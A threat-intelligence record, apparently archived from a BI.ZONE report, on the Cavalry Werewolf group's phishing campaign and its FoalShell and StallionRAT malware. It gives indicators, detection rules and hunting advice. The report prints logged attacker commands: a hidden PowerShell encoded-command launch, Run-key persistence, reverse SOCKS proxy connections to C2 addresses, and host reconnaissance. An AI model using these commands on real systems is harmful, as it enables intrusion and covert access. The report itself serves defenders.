{ "id": "eec2b85f-ea07-4fd4-b54e-3e7f8b47afb2", "created_at": "2026-04-06T00:10:23.314523Z", "updated_at": "2026-04-10T13:11:50.274115Z", "deleted_at": null, "sha1_hash": "e95ee1309360759482c515f00491c6b9fec388ad", "title": "Cavalry Werewolf raids Russia’s public sector with trusted relationship attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2712169, "plain_text": "Cavalry Werewolf raids Russia’s public sector with trusted\r\nrelationship attacks\r\nBy BI.ZONE\r\nPublished: 2025-10-02 · Archived: 2026-04-05 14:37:00 UTC\r\nBI.ZONE Threat Intelligence recorded Cavalry Werewolf* activity from May to August 2025.\r\nIn order to gain initial access, the attackers sent out targeted phishing emails disguising them as official\r\ncorrespondence from Kyrgyz government officials. The main targets of the attacks were Russian state agencies, as\r\nwell as energy, mining, and manufacturing enterprises.\r\nCavalry Werewolf relied on the malware of its own design: FoalShell reverse shells and StallionRAT (remote\r\naccess trojans) controlled via Telegram.\r\n*Aliases: YoroTrooper, SturgeonPhisher, Silent Lynx, Comrade Saiga, Tomiris, ShadowSilk\r\nKey findings\r\nCavalry Werewolf is actively experimenting with expanding its arsenal. This highlights the importance of\r\nhaving quick insights into the tools used by the cluster, otherwise it would be impossible to maintain up-to-date measures to prevent and detect such attacks.\r\nAttackers can not only impersonate officials but also actually compromise their email accounts for\r\nphishing. Therefore, it is critical to carefully check both the sender and the content: text, links, and\r\nattachments.\r\nEven if attacks are not made public, that does not mean they do not exist. Cyber intelligence portals allow\r\nfor quick access to up-to-date information about the cyber threat landscape in the region and effective\r\nprioritization of defenses.\r\nCampaign\r\nPhishing\r\nIn their targeted phishing campaigns against Russian organizations, Cavalry Werewolf used fake email addresses\r\nof employees from Kyrgyz agencies, for example:\r\nMinistry of Economy and Commerce\r\nMinistry of Culture, Information, Sports and Youth Policy\r\nMinistry of Transport and Communications\r\nThe phishing emails contained a RAR with either FoalShell or StallionRAT malware.\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 1 of 16\n\nIn one of the phishing mailings, the attackers used a real email address found on the website of the Kyrgyz\r\nRepublic’s regulatory authority. It is likely that the attackers had compromised this address earlier to use in future\r\nattacks.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 2 of 16\n\nPress enter or click to view image in full size\r\nExamples of phishing emails\r\nThreat hunting\r\nWhen searching for threats, you can track the creation of suspicious archives with names similar to\r\ndocument names in the %LocalAppData%\\Microsoft\\Windows\\INetCache\\Content.Outlook directory.\r\nThis folder stores files downloaded to the Outlook client on a user’s host.\r\nFoalShell\r\nFoalShell is a simple reverse shell used by Cavalry Werewolf, written in Go, C++, and C#. FoalShell allows\r\nattackers to execute arbitrary commands in the cmd.exe command line interpreter on a compromised host.\r\nFoalShell C#\r\nThe source code of the .NET application is simple: essentially, it is a standard reverse shell that operates via cmd\r\nwith input and output thread redirection. As a result, the attacker gains access to the command line on the victim's\r\nremote device and can execute any command. The cmd.exe window runs in hidden mode. If input/output errors\r\nor socket failures occur, the application automatically terminates.\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 3 of 16\n\nKnown file names:\r\nО результатах трёх месяцев совместной работы [redacted].exe (three-month results of joint\r\noperations)\r\nСписок сотрудников выдвинутых к премии ко Дню России.exe.exe (shortlist of employees to\r\nreceive bonuses)\r\nПриказ о поощрении сотрудников ко дню России (Т-11а) №1 от 30.05.2025.exe (employee\r\nincentive order)\r\nО ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe (information to be\r\nprovided prior a meeting)\r\nО работе почтового сервера план и проведенная работа.exe (scheduled and completed works\r\non the mail server)\r\nО проведении личного приема граждан список участников.exe (list of attendants to conduct\r\nappointments with the citizens)\r\nСлужбеная записка от 16.06.2025___________________________.exe (memo)\r\nDetected PDB paths:\r\nC:\\Users\\yaadzrr\\Documents\\reverseShells\\Reverse-Shell-CS\\Payload\\Real_cli\\obj\\Release\\Docu_rsnet.pdb\r\nC:\\Users\\yueying\\Documents\\reverseShells\\Reverse-Shell-CS\\Payload\\Real_cli\\obj\\Release\\NetChecker.pdb\r\nPress enter or click to view image in full size\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 4 of 16\n\nC# code snippet from FoalShell reverse shell\r\nUsing the build ID 8923c4d9-3fbf-4cf3-8a63-c5102293b774 , namespace, and code structure, we were able to\r\nfind the GitHub repository* with the original design used as the basis for this malware.\r\n* “xcyraxx/Reverse-Shell-CS,” GitHub\r\nFoalShell Cpp\r\nHere, the adversaries used a C++ launcher containing a shellcode and an obfuscated FoalShell reverse shell inside\r\na resource called output_bin . When started up, the launcher reads the resource, at the same time, a memory\r\nspace is allocated using the WinAPI function VirtualAlloc with RWE permissions. Then the resource contents\r\nare copied to the allocated memory and the shellcode is executed, which deobfuscates the main reverse shellcode\r\nand transfers control to it using the WinAPI function ZwResumeThread .\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 5 of 16\n\nKnown file names:\r\nО работе почтового сервера план и проведенная работа.exe (scheduled and completed works\r\non the mail server)\r\nПрограммный офис Управления Организации Объединенных Наций по наркотикам и\r\nпреступности (УНП ООН).exe (UNO Drugs and Crime Office)\r\nПлан-протокол встречи о сотрудничестве представителей должн.лиц.exe (meeting agenda for\r\ncooperation between officials)\r\nАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на\r\nтерритории Сибирского федерального округа.exe (classification of projects in the Siberian Federal\r\nDistrict)\r\nИнформация по письму в МИД от 6 июля статус и прилагаемые документы.exe (letter and\r\nattachments to the Ministry of Internal Affairs)\r\nО проведении личного приема граждан список участников план и проведенная работа.exe\r\n(list of attendants to conduct appointments with the citizens)\r\nPDB path:\r\nC:\\Users\\Professional\\Source\\Repos\\bin_loader\\x64\\Release\\bin_loader.pdb\r\noutput_bin resource with FoalShell Cpp reverse shell payload\r\nThe main reverse shellcode uses network sockets, runs cmd.exe in hidden mode, and redirects input/output\r\nthreads to the console, allowing the cluster to execute arbitrary commands on the victim's remote host.\r\nPress enter or click to view image in full size\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 6 of 16\n\nMain FoalShell Cpp reverse shell code\r\nFoalShell Go\r\nThis version of the reverse shell, implemented in Go, establishes a connection with a remote control server and\r\nprovides the attackers with hidden access to the command line of the victim’s computer.\r\nKnown file names:\r\nСлужебная записка от 20.08.2025[multiple spaces].exe (memo)\r\nСлужебная записка от 12.08.2025[multiple spaces].exe (memo)\r\nАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на\r\nтерритории Сибирского федерального округа проектов к проектам.exe (classification of\r\nprojects in the Siberian Federal District)\r\nProject path:\r\nC:\\source\\repos\\ggg\r\nPress enter or click to view image in full size\r\nGo code snippet from FoalShell reverse shell\r\nThreat hunting\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 7 of 16\n\nIdea for hypothesis\r\nWhen searching for threats, monitor processes with the executable file cmd.exe launched by a\r\nsuspicious parent process.\r\nThese may include:\r\nprocesses typically used by malicious actors and stored in the following folders:\r\n— %Temp%\r\n— %LocalAppData%\r\n— %AppData%\\Roaming\r\n— C:\\Users\\Public\r\n— %UserProfile%\\Downloads\r\n— %UserProfile%\\Desktop\r\nparent processes with a short lifetime on the host\r\nprocesses with names mimicking document names\r\nStallionRAT\r\nThis is a group of remote access trojans written in Go, PowerShell, and Python, used by Cavalry Werewolf.\r\nStallionRAT allows attackers to execute arbitrary commands, load additional files, and exfiltrate collected data.\r\nThe cluster uses a Telegram bot as their C2 server.\r\nKnown file names:\r\nАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на\r\nтерритории Сибирского федерального округа.exe (classification of projects in the Siberian Federal\r\nDistrict)\r\nDiscovered PDB path:\r\nC:\\Users\\Admin\\source\\repos\\ConsoleApplication3\\x64\\Release\\ConsoleApplication3.pdb\r\nIn this campaign, the attackers employed a launcher written in C++ to run an instance of the StallionRAT malware\r\nin PowerShell. The launcher executes PowerShell with a Base64-encoded command.\r\nThe command line argument format is as follows:\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgAC\r\nThe execution of this PowerShell command launches StallionRAT, which is controlled via Telegram.\r\nThreat detection\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 8 of 16\n\nIn the effort to detect suspicious activity, you can configure a correlation rule for powershell.exe\r\nprocess runs with the -EncodedCommand parameter, as attackers often use Base64 encoding to bypass\r\nsecurity mechanisms and correlation rules. This activity may also be typical for administrators, but such\r\nactions can be excluded from the correlation rule.\r\nThreat hunting\r\nTo detect threats related to this activity, search for powershell.exe startup events with the parameters\r\n-WindowStyle Hidden and -ExecutionPolicy Bypass . These parameters can be used by the\r\nadversary to secretly run code and bypass defenses. However, unlike the detection idea above, many\r\nlegitimate programs also use these commands, which are quite difficult to filter out on a regular basis.\r\nAt the initialization stage, StallionRAT assigns DeviceID to the compromised host. DeviceID is a random\r\nnumber between 100 and 10,000. The malware also obtains the computer name using $env:COMPUTERNAME .\r\nGet BI.ZONE’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nIn an infinite loop ( while True ), the getUpdates function is constantly called to receive new commands and\r\nmessages from the Telegram bot. The results of command execution and error messages are sent to a designated\r\nTelegram chat specified in the StallionRAT code.\r\nRAT commands:\r\n/list receives a list of compromised hosts connected to the C2. Returns a list containing the DeviceID\r\nand computer name.\r\n/go [DeviceID] [command] executes the given command using Invoke-Expression .\r\n/upload [DeviceID] loads a file to the victim's device via Download-TelegramFile and saves to\r\nC:\\Users\\Public\\Libraries\\%fileName% .\r\nPress enter or click to view image in full size\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 9 of 16\n\nStallionRAT code snippet responsible for command execution\r\nAfter examining additional information, we discovered commands executed by StallionRAT on one of the\r\ncompromised hosts with the ID 9139 . These commands indicate that the RAT was delivered to the\r\nC:\\Users\\Public\\Libraries directory and added to startup through the Run registry key:\r\n'win.exe' successfully uploaded \u003e\u003e C:\\Users\\Public\\Libraries\\win.exe.\r\n/go9139 REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinRVN /t REG_SZ /d C:\\users\\pu\r\nFurthermore, the identified commands presented below indicate the use of SOCKS5 proxying tools:\r\nReverseSocks5Agent and ReverseSocks5*.\r\n“Acebond/ReverseSocks5: Single executable reverse SOCKS5 proxy written in Golang,” GitHub\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 10 of 16\n\n/go9139 C:\\users\\public\\libraries\\rev.exe -pcl 96.9.125[.]168:443\r\n/go9139 C:\\users\\public\\libraries\\rev.exe -pcl 78.128.112[.]209:10443\r\n/go9139 C:\\users\\public\\libraries\\revv2.exe -connect 96.9.125[.]168:443\r\n/go9139 C:\\users\\public\\libraries\\revv2.exe -connect 78.128.112[.]209:10443\r\nIn addition, there were commands executed to collect information about the compromised host:\r\n/go9139 ipconfig /all\r\n/go9139 netstat\r\n/go9139 whoami\r\n/go9139 ls C:\\users\\public\\libraries\r\n/go9139 ping 10.70.70.10\r\n/go9139 net user /dom\r\nThreat hunting\r\nWhen searching for the suspicious activity described above, focus on the following hypotheses:\r\nsearch for and analyze file create events in the C:\\Users\\Public\\Libraries\\ folder, as well as process\r\nlaunch events in the said folder\r\nsearch for suspicious file pin events in the \\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nregistry hive by using the reg.exe registry utility and the add command, or leveraging the registry\r\nmodification tracking functionality offered by EDR solutions, among others\r\nsearch for environment exploration events with commands such as whoami , netstat , ipconfig ,\r\nwhich are run by suspicious parent processes and users who have never applied such commands before\r\nAnalysis of additional information\r\nThe investigation revealed additional information related to Cavalry Werewolf preparing for attacks and testing\r\nmalicious programs.\r\nIn the first case, the discovered files indicate preparations for an attack against Russian companies, as well as a\r\nfile in the Tajik language C:\\Users\\Admin\\Desktop\\Номерхои коргархо new.rar , which may be evident of the\r\nattackers also targeting Tajikistan.\r\nBesides, there is reason to believe that, in addition to the identified malware, the attackers may have used other\r\ntools, such as AsyncRAT. This is indicated by the path: C:\\Users\\Admin\\Desktop\\Async Rust RAT_0.1.0_x64_en-US.msi .\r\nPress enter or click to view image in full size\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 11 of 16\n\nFile paths on the adversary’s computer\r\nIn the second case, besides the files named in English, we found files named in Arabic. This suggests that the\r\nattackers might be targeting countries in the Middle East. Thus, the span of Cavalry Werewolf attacks is quite\r\nbroad and not limited to Russia, other CIS countries, and regions where their malicious activity has been recorded.\r\nPress enter or click to view image in full size\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 12 of 16\n\nFile paths on the adversary’s computer\r\nIndicators of compromise\r\nArchives\r\n27a11c59072a6c2f57147724e04c7d6884b52921da2629fb0807e0bb93901cbc\r\n3cd7f621052919e937d9a2fdd4827fc7f82c0319379c46d4f9b9dd5861369ffc\r\nc3df16cce916f1855476a2d1c4f0946fa62c2021d1016da1dc524f4389a3b6fa\r\ne15f1a6d24b833ab05128b4b34495ef1471bd616b9833815e2e98b8d3ae78ff2\r\ndae3c08fa3df76f54b6bae837d5abdc309a24007e9e6132a940721045e65d2bb\r\n8404f8294b14d61ff712b60e92b7310e50816c24b38a00fcc3da1371a3367103\r\n8e6d7c44ab66f37bf24351323dc5e8d913173425b14750a50a2cbea6d9e439ba\r\nfa6cdd1873fba54764c52c64eadca49d52e5b79740364ef16e5d86d61538878d\r\n0e7b65930bc73636f2f99b05a3bb0af9aaf17d3790d0107eb06992d25e62f59d\r\nc9ffbe942a0b0182e0cd9178ac4fbf8334cae48607748d978abf47bd35104051\r\n04769b75d7fb42fbbce39d4c4b0e9f83b60cc330efa477927e68b9bdba279bb8\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 13 of 16\n\n7da82e14fb483a680a623b0ef69bcfbd9aaaedf3ec26f4c34922d6923159f52f\r\nFoalShell\r\nc26b62fa593d6e713f1f2ccd987ef09fe8a3e691c40eb1c3f19dd57f896d9f59\r\n1dfe65e8dc80c59000d92457ff7053c07f272571a8920dbe8fc5c2e7037a6c98\r\na8ada7532ace3d72e98d1e3c3e02d1bd1538a4c5e78ce64b2fe1562047ba4e52\r\ncc9e5d8f0b30c0aaeb427b1511004e0e4e89416d8416478144d76aa1777d1554\r\nec80e96e3d15a215d59d1095134e7131114f669ebc406c6ea1a709003d3f6f17\r\n8e7fb9f6acfb9b08fb424ff5772c46011a92d80191e7736010380443a46e695c\r\nb13b83b515ce60a61c721afd0aeb7d5027e3671494d6944b34b83a5ab1e2d9f4\r\naf3d740c5b09c9a6237d5d54d78b5227cdaf60be89f48284b3386a3aadeb0283\r\n4f17a7f8d2cec5c2206c3cba92967b4b499f0d223748d3b34f9ec4981461d288\r\n22ba8c24f1aefc864490f70f503f709d2d980b9bc18fece4187152a1d9ca5fab\r\n148a42ccaa97c2e2352dbb207f07932141d5290d4c3b57f61a780f9168783eda\r\n7084f06f2d8613dfe418b242c43060ae578e7166ce5aeed2904a8327cd98dbdf\r\nab0ad77a341b12cfc719d10e0fc45a6613f41b2b3f6ea963ee6572cf02b41f4d\r\n6b290953441b1c53f63f98863aae75bd8ea32996ab07976e498bad111d535252\r\nStallionRAT\r\ncc84bfdb6e996b67d8bc812cf08674e8eca6906b53c98df195ed99ac5ec14a06\r\nReverseSocks5\r\nfbf1bae3c576a6fcfa86db7c36a06c2530423d487441ad2c684cfeda5cd19685\r\nReverseSocks5Agent\r\na3ec2992e6416a3af54b3aca3417cf4a109866a07df7b5ec0ace7bd1bf73f3c6\r\nNetwork indicators\r\n188.127.225[.]191:443\r\n94.198.52[.]200:443\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 14 of 16\n\n91.219.148[.]93:443\r\n185.244.180[.]169:443\r\n109.172.85[.]95:443\r\n185.231.155[.]111:443\r\n185.173.37[.]67:443\r\n188.127.227[.]226:443\r\n62.113.114[.]209:443\r\n96.9.125[.]168:443\r\n78.128.112[.]209:10443\r\nMITRE ATT\u0026CK\r\nDetection\r\nThe BI.ZONE TDR rules below can help organizations detect the described malicious activity:\r\nwin_suspicious_powershell_encoded_command\r\ngen_ti_wolfs_network_ioc_was_detected\r\ngen_ti_wolfs_hash_was_detected\r\nwin_discovery_owner_and_users_system\r\nwin_discovery_system_network_configuration\r\nwin_discovery_network_connections\r\nwin_th_start_hidden_powershell\r\nHow to protect your company from such threats\r\nPhishing still ranks first among the attack vectors: adversaries rely on the recipient’s carelessness to distribute\r\nmalware via emails.\r\nYou can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect\r\nyour email communications. Immediately after installation, more than 100 protection mechanisms are activated:\r\nagainst spam, phishing, spoofing, mail server vulnerabilities, and malware attacks. Filtering uses statistical,\r\nsignature, linguistic, content, heuristic analysis, and machine vision. The ML model accurately classifies emails by\r\ncontent and adjusts their ratings. As a result, illegitimate emails are blocked, while secure emails are delivered\r\nwithout delay.\r\nTo build effective cyber defense, it is essential to understand which threats are relevant to your organization.\r\nBI.ZONE Threat Intelligence can greatly simplify this task. The portal provides information about the current\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 15 of 16\n\nattacks, threat actors, their methods, tools, as well as data from underground resources. This intelligence helps you\r\nstay proactive and accelerate your incident response.\r\nSource: https://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef" ], "report_names": [ "cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef" ], "threat_actors": [ { "id": "493c47f7-b265-4b10-95de-d86af942c543", "created_at": "2023-04-27T02:04:45.385041Z", "updated_at": "2026-04-10T02:00:04.939878Z", "deleted_at": null, "main_name": "Tomiris", "aliases": [], "source_name": "ETDA:Tomiris", "tools": [ "JLOGRAB", "JLORAT", "Kapushka", "KopiLuwak", "Meterpreter", "QUIETCANARY", "RATel", "RocketMan", "Roopy", "Telemiris", "Tomiris", "Topinambour", "Tunnus", "Warzone", "Warzone RAT" ], "source_id": "ETDA", "reports": null }, { "id": "c416152c-d268-40a3-8887-01d2ec452b7c", "created_at": "2023-04-27T02:04:45.481771Z", "updated_at": "2026-04-10T02:00:04.987067Z", "deleted_at": null, "main_name": "YoroTrooper", "aliases": [ "Silent Lynx" ], "source_name": "ETDA:YoroTrooper", "tools": [ "Loda", "Loda RAT", "LodaRAT", "Meterpreter", "Nymeria", "Warzone", "Warzone RAT" ], "source_id": "ETDA", "reports": null }, { "id": "322248d6-4baf-4ada-af8e-074bc6c10132", "created_at": "2023-11-05T02:00:08.072145Z", "updated_at": "2026-04-10T02:00:03.397406Z", "deleted_at": null, "main_name": "YoroTrooper", "aliases": [ "Comrade Saiga", "Salted Earth", "Sturgeon Fisher", "ShadowSilk", "Silent Lynx", "Cavalry Werewolf", "SturgeonPhisher" ], "source_name": "MISPGALAXY:YoroTrooper", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434223, "ts_updated_at": 1775826710, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e95ee1309360759482c515f00491c6b9fec388ad.pdf", "text": "https://archive.orkl.eu/e95ee1309360759482c515f00491c6b9fec388ad.txt", "img": "https://archive.orkl.eu/e95ee1309360759482c515f00491c6b9fec388ad.jpg" } }